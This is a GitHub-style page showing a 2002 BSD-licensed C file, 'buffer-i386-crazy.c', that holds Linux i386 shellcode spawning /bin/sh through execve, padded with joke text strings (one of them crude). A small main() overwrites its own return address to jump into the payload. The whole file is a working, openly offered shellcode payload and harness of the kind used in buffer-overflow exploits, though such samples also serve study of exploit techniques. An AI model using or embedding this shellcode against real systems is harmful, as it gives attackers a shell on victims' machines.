-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathbuffer-i386-crazy.c
53 lines (48 loc) · 2.14 KB
/
buffer-i386-crazy.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
/*
* execve ("/bin/sh"..) (linux little endian)
*
* Copyright (c) 2002 Angelo Dell'Aera <[email protected]>
*
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1"
"THREE.RULES.TO.CODE.COOL.SHELLCODES"
"\x44\x44\x83\xc4\x20\x40\x40\x80\xeb\x03\x66"
"\x83\xc7\x05\x66\x83\xed\x06\x51"
"IF.LIFE.IS.SHORT.YOUR.SHELLCODE.SHOULD.BE.SHORTER"
"\x44\x44\x83\xc4\x30\x59\x04\x04\x4b\x4a\x4e"
"\x4e\x66\x83\xc7\x05\x66\x83\xed\x05\x51"
"NEVER.THINK.ABOUT.YOUR.MOMMY.WHILE.CODING"
"\x83\xc4\x18\x59\x40\x40\x4a\x66\x83\xc6\x03"
"\x66\x83\xc7\x03\x55"
"DONT.TOUCH.REGISTERS.TITS.ARE.BETTER"
"\x4c\x83\xc4\x3c\x40\x4b\x41\x4a\x46\x47\x66"
"\x83\xed\x05\xcd\x80";
main() {
long *ret;
ret = (long *)&ret + 2;
(*ret) = (long)shellcode;
}